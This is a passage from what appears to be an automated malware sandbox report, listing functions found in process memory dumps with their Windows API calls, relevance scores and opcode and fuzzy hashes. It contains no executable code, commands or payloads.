                                                        • Opcode Fuzzy Hash: 5b50e6d994d812fb90f429ccacffd1aa705e16a6296db62a990a0c8b2907a210
                                                        • Instruction Fuzzy Hash: 31115C72508384AFDB22CF65DC45A52FFF4EF05210F08859AEA898B662D276E418DB61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 02840886, Relevance: 1.6, APIs: 1, Instructions: 60fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • ReadFile.KERNELBASE(?,00000E9C,8AA3FD8C,00000000,00000000,00000000,00000000), ref: 028408E5
                                                        Memory Dump Source
                                                        • Source File: 00000020.00000002.2166521816.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                                        Similarity
                                                        • API ID: FileRead
                                                        • String ID:
                                                        • API String ID: 2738559852-0
                                                        • Opcode ID: 84ac162de65c390e56331151608abbe6d268e287c2f48c614d4f38ae39a08629
                                                        • Instruction ID: e9efbd9d53ea0e566668113b4cf55ff571fbed0afa2fac6ae04ae33295d5a52f
                                                        • Opcode Fuzzy Hash: 84ac162de65c390e56331151608abbe6d268e287c2f48c614d4f38ae39a08629
                                                        • Instruction Fuzzy Hash: 7E11EF76000308EFEB21CF50DC44FA7FBA8EF04320F04896AEE089A241C671A504CBB1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01F4A33C, Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetErrorMode.KERNELBASE(?), ref: 01F4A39C
                                                        Memory Dump Source
                                                        • Source File: 00000020.00000002.2159677331.0000000001F4A000.00000040.00000001.sdmp, Offset: 01F4A000, based on PE: false
                                                        Similarity
                                                        • API ID: ErrorMode
                                                        • String ID:
                                                        • API String ID: 2340568224-0
                                                        • Opcode ID: 39c93273cf874151665bfe0b4fc1049d282d99079ebd17e3a13fa1fd86a9370d
                                                        • Instruction ID: 1bbc425d273ff3920acfd0355114225d9d4d22c1bf2bff4a9bca305352386353
                                                        • Opcode Fuzzy Hash: 39c93273cf874151665bfe0b4fc1049d282d99079ebd17e3a13fa1fd86a9370d
                                                        • Instruction Fuzzy Hash: 36114F715093C49FE7128B15DC54AA2BFB4EF47654F0880DBEDC58F253D266A808DB62
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 028412D8, Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetConsoleTextAttribute.KERNEL32(?,?), ref: 0284132F
                                                        Memory Dump Source
                                                        • Source File: 00000020.00000002.2166521816.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                                        Similarity
                                                        • API ID: AttributeConsoleText
                                                        • String ID:
                                                        • API String ID: 646522457-0
                                                        • Opcode ID: 245911de6f9ed736128fa3fbcacc625ad5e89d04d7f1eab8bad24dfcaf3d7413
                                                        • Instruction ID: b523dbcc1fd09714069f15306ca673e2e320ef190f92ae26434e3c57bc631df4
                                                        • Opcode Fuzzy Hash: 245911de6f9ed736128fa3fbcacc625ad5e89d04d7f1eab8bad24dfcaf3d7413
                                                        • Instruction Fuzzy Hash: 6411C1755083849FDB218F25DC49B96FFE4EF06220F0884EFED498B252D279A808CB61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 028405E8, Relevance: 1.6, APIs: 1, Instructions: 54fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • UnmapViewOfFile.KERNELBASE(?), ref: 02840640
                                                        Memory Dump Source
                                                        • Source File: 00000020.00000002.2166521816.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                                        Similarity
                                                        • API ID: FileUnmapView
                                                        • String ID:
                                                        • API String ID: 2564024751-0
                                                        • Opcode ID: f5251615e1d4451da07953fd7740daf0f3f8d678b685e298cab744ebab845f93
                                                        • Instruction ID: 2814065f9f39fc158ce01f264193e98daa410b8a5040f8109de45a0b0fd51e4f
                                                        • Opcode Fuzzy Hash: f5251615e1d4451da07953fd7740daf0f3f8d678b685e298cab744ebab845f93
                                                        • Instruction Fuzzy Hash: 231102755093C09FDB128B15DC84B52FFB4EF02220F0880EBED898B663D265A808CB62
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01F4AAD2, Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 01F4AB1A
                                                        Memory Dump Source
                                                        • Source File: 00000020.00000002.2159677331.0000000001F4A000.00000040.00000001.sdmp, Offset: 01F4A000, based on PE: false
                                                        Similarity
                                                        • API ID: LookupPrivilegeValue
                                                        • String ID:
                                                        • API String ID: 3899507212-0
                                                        • Opcode ID: 47b7facf571b23e8bafbf673ff887a4d8e8df63f521495b2952dfdaa9b5e39ab
                                                        • Instruction ID: 2be38b2505f5066701bdcf51470a00e6a796337eee50e0efac11a2e70f73b9d5
                                                        • Opcode Fuzzy Hash: 47b7facf571b23e8bafbf673ff887a4d8e8df63f521495b2952dfdaa9b5e39ab
                                                        • Instruction Fuzzy Hash: 97115EB2A40740DFEB21DF29DC85B56FFE8EB04665F08C46AED0ACB642D675E404CA61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01F4AA0F, Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetConsoleOutputCP.KERNEL32 ref: 01F4AA71
                                                        Memory Dump Source
                                                        • Source File: 00000020.00000002.2159677331.0000000001F4A000.00000040.00000001.sdmp, Offset: 01F4A000, based on PE: false
                                                        Similarity
                                                        • API ID: ConsoleOutput
                                                        • String ID:
                                                        • API String ID: 3985236979-0
                                                        • Opcode ID: 1d4e06db8df42fe702f2dc59a431ead746b000ef7b642607e70909ecf2ca7726
                                                        • Instruction ID: 28b5c70deaf8bb0263ac970a21a89beffb29a498b60bcbb9df1958e547a1e527
                                                        • Opcode Fuzzy Hash: 1d4e06db8df42fe702f2dc59a431ead746b000ef7b642607e70909ecf2ca7726
                                                        • Instruction Fuzzy Hash: 5411E37540D7C09FD7128B15DC85B91BFB4EF03224F0980DBDD858F163D269A909CB62
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0284092F, Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetSystemInfo.KERNELBASE(?), ref: 0284099C
                                                        Memory Dump Source
                                                        • Source File: 00000020.00000002.2166521816.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                                        Similarity
                                                        • API ID: InfoSystem
                                                        • String ID:
                                                        • API String ID: 31276548-0
                                                        • Opcode ID: 96f0ae288d9f1c5be4195f2faa204e8df45d9d28dafe36d098f70c90567a794e
                                                        • Instruction ID: b8ba0064cb40b62ff2ba1ab8dfe10cf851d2552ee748ed3bd84957096ba33c0b
                                                        • Opcode Fuzzy Hash: 96f0ae288d9f1c5be4195f2faa204e8df45d9d28dafe36d098f70c90567a794e
                                                        • Instruction Fuzzy Hash: 02119D754093C49FE7128B25DC59B92BFB4EF07324F0980DAD9888B263C265A908CB62
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 028407C6, Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetFileType.KERNELBASE(?,00000E9C,8AA3FD8C,00000000,00000000,00000000,00000000), ref: 02840819
                                                        Memory Dump Source
                                                        • Source File: 00000020.00000002.2166521816.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                                        Similarity
                                                        • API ID: FileType
                                                        • String ID:
                                                        • API String ID: 3081899298-0
                                                        • Opcode ID: 4d934ccedfeb0a572db4e3bd8482c86710248a57ee54e64935ed05382e6a2a42
                                                        • Instruction ID: fafebebcb484343418a2df243419dc8604728c129fe17fbf67aa9e615f52cac9
                                                        • Opcode Fuzzy Hash: 4d934ccedfeb0a572db4e3bd8482c86710248a57ee54e64935ed05382e6a2a42
                                                        • Instruction Fuzzy Hash: F101C479500308EFFB209F11DD85BA7FB98DF04721F148096EE089B241D674A904CAA1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 028413AA, Relevance: 1.6, APIs: 1, Instructions: 51COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000020.00000002.2166521816.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                                        Similarity
                                                        • API ID: ConsoleWrite
                                                        • String ID:
                                                        • API String ID: 2657657451-0
                                                        • Opcode ID: 768640fd5dcc5c72fda8e199a81ac2bc272d4e23f1eb0a94c568bfbf80b5b4b2
                                                        • Instruction ID: 60c8a8bb31ca0fc18a28449350a4f115134be4402c67d5989c0a3a10433c625d
                                                        • Opcode Fuzzy Hash: 768640fd5dcc5c72fda8e199a81ac2bc272d4e23f1eb0a94c568bfbf80b5b4b2
                                                        • Instruction Fuzzy Hash: BF11AC79500704DBEB20CF15D888B66FBA4EB04624F08C4AADD09CB612D775E444CA61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01F4AB75, Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetLogicalDrives.KERNELBASE ref: 01F4ABC9
                                                        Memory Dump Source
                                                        • Source File: 00000020.00000002.2159677331.0000000001F4A000.00000040.00000001.sdmp, Offset: 01F4A000, based on PE: false
                                                        Similarity
                                                        • API ID: DrivesLogical
                                                        • String ID:
                                                        • API String ID: 999431828-0
                                                        • Opcode ID: e6929396b516743a13e583be46d4239adb0a529450545aafb54b1e701b9e963f
                                                        • Instruction ID: ff9aa3a121dc72c0e5705b1ff178d67ced8063324f68e79617d896ead61cf243
                                                        • Opcode Fuzzy Hash: e6929396b516743a13e583be46d4239adb0a529450545aafb54b1e701b9e963f
                                                        • Instruction Fuzzy Hash: E911C2B58093809FDB11CF65DC85B82BFA4EF02224F0980ABDD498F153D275A508CB61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01F4BA32, Relevance: 1.5, APIs: 1, Instructions: 49fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CreateFileW.KERNELBASE(?,?,?,?,?,?,?), ref: 01F4BA7E
                                                        Memory Dump Source
                                                        • Source File: 00000020.00000002.2159677331.0000000001F4A000.00000040.00000001.sdmp, Offset: 01F4A000, based on PE: false
                                                        Similarity
                                                        • API ID: CreateFile
                                                        • String ID:
                                                        • API String ID: 823142352-0
                                                        • Opcode ID: d372c164d95e72c468bb152385edab92bfe3ac3730c9106553f18177794fb959
                                                        • Instruction ID: ae2e168ce2068920c85ece1df7fc71f56efb33f2908b4c64a9dbe767d787c860
                                                        • Opcode Fuzzy Hash: d372c164d95e72c468bb152385edab92bfe3ac3730c9106553f18177794fb959
                                                        • Instruction Fuzzy Hash: 44118E72504700DFEB21CF55DC44B52FFE4FF08611F0885AADE898A612D372E414DB61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01F4A1EE, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetConsoleCtrlHandler.KERNEL32(?,00000E9C,?,?), ref: 01F4A23E
                                                        Memory Dump Source
                                                        • Source File: 00000020.00000002.2159677331.0000000001F4A000.00000040.00000001.sdmp, Offset: 01F4A000, based on PE: false
                                                        Similarity
                                                        • API ID: ConsoleCtrlHandler
                                                        • String ID:
                                                        • API String ID: 1513847179-0
                                                        • Opcode ID: 5cd84816b4b21d3a1c93b095193006a6eef057ca8437f9d2bea95feef40610e7
                                                        • Instruction ID: 3054e738743159e3790a9100dd794d4ee7d71b86e9aad43b89761bc0db0f236a
                                                        • Opcode Fuzzy Hash: 5cd84816b4b21d3a1c93b095193006a6eef057ca8437f9d2bea95feef40610e7
                                                        • Instruction Fuzzy Hash: 07018471900600AFE310DF16DC46B66FBF8FB88A60F14816AED089B741D275F515CBE5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 02840196, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetConsoleTitleW.KERNEL32(?), ref: 028401D0
                                                        Memory Dump Source
                                                        • Source File: 00000020.00000002.2166521816.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                                        Similarity
                                                        • API ID: ConsoleTitle
                                                        • String ID:
                                                        • API String ID: 3358957663-0
                                                        • Opcode ID: 9796d2c6f514eda70713cd251488af37a5d1bfce4db7b3f6cd7e20f4f46a3d6c
                                                        • Instruction ID: 797187e0761693ed3a93817e72a227c09409798af594c0a620a47fe6ed808a82
                                                        • Opcode Fuzzy Hash: 9796d2c6f514eda70713cd251488af37a5d1bfce4db7b3f6cd7e20f4f46a3d6c
                                                        • Instruction Fuzzy Hash: F9019E79600348CFEB10DF25DC857A6FBA8EB00225F0884ABDE09CB642DB74E404CA61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0284104E, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetVolumeInformationW.KERNELBASE(?,00000E9C,?,?), ref: 0284109E
                                                        Memory Dump Source
                                                        • Source File: 00000020.00000002.2166521816.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationVolume
                                                        • String ID:
                                                        • API String ID: 2039140958-0
                                                        • Opcode ID: e6c4bbab59d453348e0e6ce806fb88518246d38576ff1bb458d31aa082f56329
                                                        • Instruction ID: 7ecd10290a4d08f650e61384e518857aaa832741031057f89fc803290549e2fd
                                                        • Opcode Fuzzy Hash: e6c4bbab59d453348e0e6ce806fb88518246d38576ff1bb458d31aa082f56329
                                                        • Instruction Fuzzy Hash: 75017171900600ABE310DF16DC46B66FBA8FB88A60F14816AED089B741D275B515CBE5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01F4BAFA, Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000020.00000002.2159677331.0000000001F4A000.00000040.00000001.sdmp, Offset: 01F4A000, based on PE: false
                                                        Similarity
                                                        • API ID: ConsoleMode
                                                        • String ID:
                                                        • API String ID: 4145635619-0
                                                        • Opcode ID: b39089c39d8339827f3362926432a508317b1492188e21338caca2cc07185866
                                                        • Instruction ID: 552316724a6fa6ef27fd173e4815717f106e7da57edfa931e2fb014bc4b2546b
                                                        • Opcode Fuzzy Hash: b39089c39d8339827f3362926432a508317b1492188e21338caca2cc07185866
                                                        • Instruction Fuzzy Hash: CD01DF72900240DFEB20CF19DC897A6FFA4EF04620F08C4ABDD498B656D276E804CB62
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 028412FA, Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetConsoleTextAttribute.KERNEL32(?,?), ref: 0284132F
                                                        Memory Dump Source
                                                        • Source File: 00000020.00000002.2166521816.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                                        Similarity
                                                        • API ID: AttributeConsoleText
                                                        • String ID:
                                                        • API String ID: 646522457-0
                                                        • Opcode ID: 9cda2f848df4082ae905eccea94ce44e0826b1657646657f0479bf2caa742136
                                                        • Instruction ID: ba7cb26e4b6895bf9d4e403ae552687380f47022be42b83ecfec105f5eac1bcb
                                                        • Opcode Fuzzy Hash: 9cda2f848df4082ae905eccea94ce44e0826b1657646657f0479bf2caa742136
                                                        • Instruction Fuzzy Hash: 4201BC79500344DFEF209F15DC897AAFBA4EF04628F08C4AADD0DCBA42D679A444CB61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01F4A8FA, Relevance: 1.5, APIs: 1, Instructions: 43threadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetThreadPreferredUILanguages.KERNEL32(?,00000E9C,?,?), ref: 01F4A94A
                                                        Memory Dump Source
                                                        • Source File: 00000020.00000002.2159677331.0000000001F4A000.00000040.00000001.sdmp, Offset: 01F4A000, based on PE: false
                                                        Similarity
                                                        • API ID: LanguagesPreferredThread
                                                        • String ID:
                                                        • API String ID: 842807343-0
                                                        • Opcode ID: 0db3e58c32ac200f8caa0d6c5b9cced1dc6d2b7c18d617cd147c7b992e1c9f3e
                                                        • Instruction ID: 86a943db705a2318fc65992fecb4c25d47f231a9ea4bc051645ea195fe932ffc
                                                        • Opcode Fuzzy Hash: 0db3e58c32ac200f8caa0d6c5b9cced1dc6d2b7c18d617cd147c7b992e1c9f3e
                                                        • Instruction Fuzzy Hash: 26016271900600ABD310DF16DC46B26FBB4FB88B20F14815AED085B741D275F515CBE6
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 028404B2, Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SHGetFolderPathW.SHELL32(?,00000E9C,?,?), ref: 02840502
                                                        Memory Dump Source
                                                        • Source File: 00000020.00000002.2166521816.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                                        Similarity
                                                        • API ID: FolderPath
                                                        • String ID:
                                                        • API String ID: 1514166925-0
                                                        • Opcode ID: dbdd3beaf238489163fc0bbd02e67d3fb0edbe647d8f553063fb688c64e7be3f
                                                        • Instruction ID: 37daed1ed198a8284429f68766c8178395ff3e76cca102317d2b855a2a158d7d
                                                        • Opcode Fuzzy Hash: dbdd3beaf238489163fc0bbd02e67d3fb0edbe647d8f553063fb688c64e7be3f
                                                        • Instruction Fuzzy Hash: B5016271900600EBD310DF16DC46B26FBB4FB88B20F14815AED085B741D275F515CBE6
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 02840F76, Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetDriveTypeW.KERNELBASE(?), ref: 02840FB0
                                                        Memory Dump Source
                                                        • Source File: 00000020.00000002.2166521816.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                                        Similarity
                                                        • API ID: DriveType
                                                        • String ID:
                                                        • API String ID: 338552980-0
                                                        • Opcode ID: bf469a16b0305d0d9cbbe61772117aee7a55df7e35794424342f0f6b0a4eb84f
                                                        • Instruction ID: acdccf73ab9fb611d93df68ca6eed5265a99db910a4e2f4087db41d387ac52c4
                                                        • Opcode Fuzzy Hash: bf469a16b0305d0d9cbbe61772117aee7a55df7e35794424342f0f6b0a4eb84f
                                                        • Instruction Fuzzy Hash: 09017C79504348DFEB10DF15D885B66FBA4EB04664F0885AADE08CFA86D779E404CAA2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0284060E, Relevance: 1.5, APIs: 1, Instructions: 39fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • UnmapViewOfFile.KERNELBASE(?), ref: 02840640
                                                        Memory Dump Source
                                                        • Source File: 00000020.00000002.2166521816.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                                        Similarity
                                                        • API ID: FileUnmapView
                                                        • String ID:
                                                        • API String ID: 2564024751-0
                                                        • Opcode ID: 429793f4456cd2beb6aebc2b2282b8626742e258b8194765b9725478181fa65a
                                                        • Instruction ID: c374187f90edc03654947f091e319626faae6b275ee6ec591f753f76098a8d04
                                                        • Opcode Fuzzy Hash: 429793f4456cd2beb6aebc2b2282b8626742e258b8194765b9725478181fa65a
                                                        • Instruction Fuzzy Hash: 1C01F479500748CFEB108F15D885766FBA0EF45624F08C0ABDE0A8B753D775E404DEA2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01F4AB9A, Relevance: 1.5, APIs: 1, Instructions: 38COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetLogicalDrives.KERNELBASE ref: 01F4ABC9
                                                        Memory Dump Source
                                                        • Source File: 00000020.00000002.2159677331.0000000001F4A000.00000040.00000001.sdmp, Offset: 01F4A000, based on PE: false
                                                        Similarity
                                                        • API ID: DrivesLogical
                                                        • String ID:
                                                        • API String ID: 999431828-0
                                                        • Opcode ID: 853a7d1a1f3447f09c7395698f187c2c255c3e44744aba5d5f5bee68fb4a9ed3
                                                        • Instruction ID: 1f3132b349afe6300959c5800b8132659c17ffbb5a7ce61e2570a2f11eee9f41
                                                        • Opcode Fuzzy Hash: 853a7d1a1f3447f09c7395698f187c2c255c3e44744aba5d5f5bee68fb4a9ed3
                                                        • Instruction Fuzzy Hash: BB01FF31804740CFEB10DF59DC89BA2FFA4EF04224F08C4ABDD0A8F202D276A404CBA2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 02841116, Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetThreadUILanguage.KERNEL32(?), ref: 02841148
                                                        Memory Dump Source
                                                        • Source File: 00000020.00000002.2166521816.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                                        Similarity
                                                        • API ID: LanguageThread
                                                        • String ID:
                                                        • API String ID: 243849632-0
                                                        • Opcode ID: cdc4f7ae463e8d58695d581c9db6ea0d80d2850ae3a09e909e8e570094557564
                                                        • Instruction ID: 9c19b22f45f4dc10dd7c3a47e2377a0a1a35074d54d3760914b192096838a7a7
                                                        • Opcode Fuzzy Hash: cdc4f7ae463e8d58695d581c9db6ea0d80d2850ae3a09e909e8e570094557564
                                                        • Instruction Fuzzy Hash: 17F0AF39500748DFEB20DF05D889766FBA4EF05A25F08C19ADD4D8B712DA75A484CAA2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01F4A36A, Relevance: 1.5, APIs: 1, Instructions: 35COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetErrorMode.KERNELBASE(?), ref: 01F4A39C
                                                        Memory Dump Source
                                                        • Source File: 00000020.00000002.2159677331.0000000001F4A000.00000040.00000001.sdmp, Offset: 01F4A000, based on PE: false
                                                        Similarity
                                                        • API ID: ErrorMode
                                                        • String ID:
                                                        • API String ID: 2340568224-0
                                                        • Opcode ID: de89cfc44530ba534da961d894426f48536a40710bd6a2c18bd0c4e3c22504fb
                                                        • Instruction ID: 1d6c00467eb738d351bf177b9ad1ba51eee166cffbaef5b80b4b9c9733efaa6f
                                                        • Opcode Fuzzy Hash: de89cfc44530ba534da961d894426f48536a40710bd6a2c18bd0c4e3c22504fb
                                                        • Instruction Fuzzy Hash: CBF0C235904740DFEB20DF05D889765FFA0EF04721F08C09ADD4A4B752E3B6E404CAA2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0284096A, Relevance: 1.5, APIs: 1, Instructions: 35COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetSystemInfo.KERNELBASE(?), ref: 0284099C
                                                        Memory Dump Source
                                                        • Source File: 00000020.00000002.2166521816.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                                        Similarity
                                                        • API ID: InfoSystem
                                                        • String ID:
                                                        • API String ID: 31276548-0
                                                        • Opcode ID: a68370fd89df991f6efdbc09563f68ecc29a6f2b8d160ef8fff98050083be331
                                                        • Instruction ID: c6ae11b589e9cfd3a0eb0672fea385b2ad6a72b8131cc27aafbff38c0357657e
                                                        • Opcode Fuzzy Hash: a68370fd89df991f6efdbc09563f68ecc29a6f2b8d160ef8fff98050083be331
                                                        • Instruction Fuzzy Hash: 16F0C239504748DFEB20DF15D889766FFA0EF14726F08C09ADE498B716D775A404CEA2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01F4AA42, Relevance: 1.5, APIs: 1, Instructions: 34COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetConsoleOutputCP.KERNEL32 ref: 01F4AA71
                                                        Memory Dump Source
                                                        • Source File: 00000020.00000002.2159677331.0000000001F4A000.00000040.00000001.sdmp, Offset: 01F4A000, based on PE: false
                                                        Similarity
                                                        • API ID: ConsoleOutput
                                                        • String ID:
                                                        • API String ID: 3985236979-0
                                                        • Opcode ID: 11d7694d4372aad953be8df75e05c41a83c132579186efe6d24513bd2034faee
                                                        • Instruction ID: ba9b36f031cf15aa9ede97fab5a5f27365244353be1b37285f9fd13ea6d86371
                                                        • Opcode Fuzzy Hash: 11d7694d4372aad953be8df75e05c41a83c132579186efe6d24513bd2034faee
                                                        • Instruction Fuzzy Hash: 8CF0C231940740CFEB10DF05D989761FFA4EF04621F08C09ADD0A4F742D276A508CAA2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01F4A974, Relevance: 1.3, APIs: 1, Instructions: 54COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CloseHandle.KERNELBASE(?), ref: 01F4A9C8
                                                        Memory Dump Source
                                                        • Source File: 00000020.00000002.2159677331.0000000001F4A000.00000040.00000001.sdmp, Offset: 01F4A000, based on PE: false
                                                        Similarity
                                                        • API ID: CloseHandle
                                                        • String ID:
                                                        • API String ID: 2962429428-0
                                                        • Opcode ID: 01150c12155b863dafcfdb4fdd27d34f0f89d6bcb102c063996354eb9c1320f3
                                                        • Instruction ID: b9214356e01a6c7dfdcc9c035083717b8fa04b29005a5fb08547e8f992f6896f
                                                        • Opcode Fuzzy Hash: 01150c12155b863dafcfdb4fdd27d34f0f89d6bcb102c063996354eb9c1320f3
                                                        • Instruction Fuzzy Hash: 45119171509380DFD712CF25DC49B96BFA4EF06220F0980ABED498B253D275A818CB62
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01F4A996, Relevance: 1.3, APIs: 1, Instructions: 43COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CloseHandle.KERNELBASE(?), ref: 01F4A9C8
                                                        Memory Dump Source
                                                        • Source File: 00000020.00000002.2159677331.0000000001F4A000.00000040.00000001.sdmp, Offset: 01F4A000, based on PE: false
                                                        Similarity
                                                        • API ID: CloseHandle
                                                        • String ID:
                                                        • API String ID: 2962429428-0
                                                        • Opcode ID: d06039a41f835aec29e69c5eb0841cb9de27f1edddc51b55d603668323babfdb
                                                        • Instruction ID: b18cb6de3e79122b540ba3ba0ed01d72fdaabd3a71f84cb471cb5e8b196953ec
                                                        • Opcode Fuzzy Hash: d06039a41f835aec29e69c5eb0841cb9de27f1edddc51b55d603668323babfdb
                                                        • Instruction Fuzzy Hash: 2001A275904740DFEB10DF19DC897A6FFA4EF04220F08C4ABDD0A8F642D676A814CB62
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 05810452, Relevance: .5, Instructions: 471COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000020.00000002.2177885221.0000000005810000.00000040.00000001.sdmp, Offset: 05810000, based on PE: false
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 4847b039196c075972a2ff992e50d9ff55cd19256b9e36a3c68415b82b3965b6
                                                        • Instruction ID: 7463657bd4b8c91a62e0f6d984891e71f7854542d23512299017b42cb6fd1927
                                                        • Opcode Fuzzy Hash: 4847b039196c075972a2ff992e50d9ff55cd19256b9e36a3c68415b82b3965b6
                                                        • Instruction Fuzzy Hash: FF91C99694E7D58FD3174730AC2A3857F75AB23219F0E41EBC8C0CB2E3E158894AD726
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01F607F8, Relevance: .0, Instructions: 43COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000020.00000002.2159780104.0000000001F60000.00000040.00000040.sdmp, Offset: 01F60000, based on PE: false
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 1cd2aca2a67e124a275e4034ba4a517851c7d1734d2c1dbc90669630e88bb044
                                                        • Instruction ID: af4d2011eb57d20bbd89f81cf14769cb0d98c51f985f5e5c9c6cddd5826132ab
                                                        • Opcode Fuzzy Hash: 1cd2aca2a67e124a275e4034ba4a517851c7d1734d2c1dbc90669630e88bb044
                                                        • Instruction Fuzzy Hash: 8301D6721093809FC7018F06EC40893BFF8EF8667070980ABEC488B212D275B919CB71
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01F6081E, Relevance: .0, Instructions: 27COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000020.00000002.2159780104.0000000001F60000.00000040.00000040.sdmp, Offset: 01F60000, based on PE: false
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 839fcf7e47fe6f325b9373eaf28948c5ad6f5e0be4e01313043f645918d0af93
                                                        • Instruction ID: 48a4606968d5a9f8a91455298194373a7da1233845dcb0c8a4cc7e9132dc82b5
                                                        • Opcode Fuzzy Hash: 839fcf7e47fe6f325b9373eaf28948c5ad6f5e0be4e01313043f645918d0af93
                                                        • Instruction Fuzzy Hash: 28E092766007008BD750DF0AEC41452F7E4EB84A30B18C07FDC0D8B701D176B504CAA1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 05810878, Relevance: .0, Instructions: 16COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000020.00000002.2177885221.0000000005810000.00000040.00000001.sdmp, Offset: 05810000, based on PE: false
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 773fc995765956fce71fb4388aaf3e1de5781ceb7c8c972f7430c314bce0b2c3
